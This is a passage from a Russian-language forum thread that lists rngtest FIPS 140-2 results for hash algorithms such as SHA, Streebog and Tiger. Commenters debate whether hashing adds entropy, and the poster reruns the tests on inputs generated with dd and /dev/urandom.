rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


md4                99.9?%
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


md5                99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 0
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


ripemd160            99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha1                99.9?%
rngtest: FIPS 140-2 successes: 9997
rngtest: FIPS 140-2 failures: 3
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha224                99.9?%
rngtest: FIPS 140-2 successes: 9996
rngtest: FIPS 140-2 failures: 4
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha256                99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha384                99.9?%
rngtest: FIPS 140-2 successes: 9988
rngtest: FIPS 140-2 failures: 12
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha512                99.9?%
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-224            99.9?%
rngtest: FIPS 140-2 successes: 9987
rngtest: FIPS 140-2 failures: 13
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 8
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-256            99.9?%
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-384            99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 3
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sha3-512            99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


sm3                99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


snefru128            99.9?%
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 5
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


snefru256            99.?%                !!!!!!!!!!!!!!!
rngtest: FIPS 140-2 successes: 9984
rngtest: FIPS 140-2 failures: 16
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 6
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


streebog256            99.9?%
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 7
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


streebog512            99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


tiger                99.9?%
rngtest: FIPS 140-2 successes: 9997
rngtest: FIPS 140-2 failures: 3
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


tth                99.?%                !!!!!!!!!!!!!!!
rngtest: FIPS 140-2 successes: 9980
rngtest: FIPS 140-2 failures: 20
rngtest: FIPS 140-2(2001-10-10) Monobit: 4
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 10
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


whirlpool            99.9?%
rngtest: FIPS 140-2 successes: 9995
rngtest: FIPS 140-2 failures: 5
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


  • Хэширование вообще-то энтропию не создает Часто даже уменьшает , !*! Аноним (1), 13:28 , 12-Мрт-23 (1)
    >Статистическое исследование
    >не описана методика
    >Первая колонка - источник энтропии
    >названия алгоритмов хэширования

    Хэширование вообще-то энтропию не создает. Часто даже уменьшает.

    сообщить модератору +/ответить
  • Для хеш-сумм главное коллизии Энтропия, конечно, тоже важна, но измерять её инс, !*! Аноним (9), 22:21 , 13-Мрт-23 (4)
    Для хеш-сумм главное коллизии. Энтропия, конечно, тоже важна, но измерять её инструментом для анализа генераторов случайных чисел - некорректно.

    И даже так - ваш эксперимент показывает, что энтропия хеш-сумм заметно ниже чем у рандома. А разница между хэш-суммами незначительна и не влияет на их предназначение (плюс не забываем про некорректность инструмента измерения). ИМХО это успех.

    сообщить модератору +/ответить
  • Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник,, !*! ыы (?), 08:32 , 15-Мрт-23 (11)
    > Статистическое исследование энтропии тестом  FIPS 140-2 от 2001-10-10, rngtest из пакета
    > rng-tools.
    > Как говорят ложь

    Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник, который зависит от вашей активности за компом...

    SHA1 не берет данные из воздуха... он берет их все из того же источника что и все остальные.
    "RNG генерит случайные числа  на основе данных из пула энтропии(entropy pool) в ядре Linux. Наполнением этого пула так же занимается RNG и делается это на основе случайных событий в системе таких как: тайминги клавиатуры и дисков, движения мыши, прерывания(interrupts), сетевой трафик.
    "
    Поэтому ваш эксперимент нужно проводить не единоразово, а прогонять один и тот же тест по кругу в течении недели...и усреднить значения.

    сообщить модератору +/ответить
  • Статистическое исследование зависимости энтропии из контрольных сум от входных д, !*! Аноним (17), 18:07 , 10-Апр-23 (17)
    Статистическое исследование зависимости энтропии из контрольных сум от входных данных.

    Первый тест в этой теме получен из входных данных следующего типа:


    original (Pseudo entropy file: "ASCII text, with very long lines" ~75K)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=150 status=none

    Контрольные сумы с подозрительными результатами sha1, sha224, sha384 и tiger перепроверил с разными входящими данными.
    В статистическом исследовании проводилось всего 10 000 тестов, чего явно недостаточно чтобы дать точную цифру после трёх девяток!
    Отмечаем, что sha384 победил со следующими входными данными:
    1. date +%-N%s
    2. date +%-N%s |b2sum |sed 's/[ -]//g'
    4. dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
    5. dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none
    И опять проиграл в тесте с входными данными:
    3. dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none
    в котором sha1 и tiger опять удержали два первых места, причём tiger подтвердил лучший результат.

    То что сума ошибок в тестах больше "failures" означает что ошибки случились в одном и томже тестируемом блоке.
    Такие результаты tiger в 4 тесте возможно из-за временной большой нагрузки на комп, load average: ~20

    1.


    date +%-N%s

    sha1
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha224
    rngtest: FIPS 140-2 successes: 9992
    rngtest: FIPS 140-2 failures: 8
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha384
    rngtest: FIPS 140-2 successes: 9992
    rngtest: FIPS 140-2 failures: 8
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 1
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    2.


    date +%-N%s |b2sum |sed 's/[ -]//g'

    sha1
    rngtest: FIPS 140-2 successes: 9990
    rngtest: FIPS 140-2 failures: 10
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha224
    rngtest: FIPS 140-2 successes: 9993
    rngtest: FIPS 140-2 failures: 7
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 1
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha384
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    3.


    original (Pseudo entropy file: "ASCII text, with very long lines" ~100K)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none

    sha1
    rngtest: FIPS 140-2 successes: 9994
    rngtest: FIPS 140-2 failures: 6
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-224
    rngtest: FIPS 140-2 successes: 9993
    rngtest: FIPS 140-2 failures: 7
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-384
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9997
    rngtest: FIPS 140-2 failures: 3
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 1
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

    4.


    integer (Pseudo entropy integer: >1500 digits)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none

    sha1
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 4
    rngtest: FIPS 140-2(2001-10-10) Long run: 5
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-224
    rngtest: FIPS 140-2 successes: 9988
    rngtest: FIPS 140-2 failures: 12
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 2
    rngtest: FIPS 140-2(2001-10-10) Runs: 5
    rngtest: FIPS 140-2(2001-10-10) Long run: 2
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-384
    rngtest: FIPS 140-2 successes: 9995
    rngtest: FIPS 140-2 failures: 5
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 1
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9988
    rngtest: FIPS 140-2 failures: 12
    rngtest: FIPS 140-2(2001-10-10) Monobit: 2
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 6
    rngtest: FIPS 140-2(2001-10-10) Long run: 6
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 1

    5.


    hashed (Pseudo entropy hexadecimal: <=1172 symbols)
    Like:
    dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none

    sha1
    rngtest: FIPS 140-2 successes: 9990
    rngtest: FIPS 140-2 failures: 10
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 3
    rngtest: FIPS 140-2(2001-10-10) Long run: 6
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-224
    rngtest: FIPS 140-2 successes: 9991
    rngtest: FIPS 140-2 failures: 9
    rngtest: FIPS 140-2(2001-10-10) Monobit: 3
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 4
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    sha-384
    rngtest: FIPS 140-2 successes: 9995
    rngtest: FIPS 140-2 failures: 5
    rngtest: FIPS 140-2(2001-10-10) Monobit: 0
    rngtest: FIPS 140-2(2001-10-10) Poker: 0
    rngtest: FIPS 140-2(2001-10-10) Runs: 2
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    tiger
    rngtest: FIPS 140-2 successes: 9989
    rngtest: FIPS 140-2 failures: 11
    rngtest: FIPS 140-2(2001-10-10) Monobit: 1
    rngtest: FIPS 140-2(2001-10-10) Poker: 1
    rngtest: FIPS 140-2(2001-10-10) Runs: 6
    rngtest: FIPS 140-2(2001-10-10) Long run: 3
    rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


    сообщить модератору +/ответить


 
Пометить прочитанным Создать тему
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Архив | Избранное | Мое | Новое | | |



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру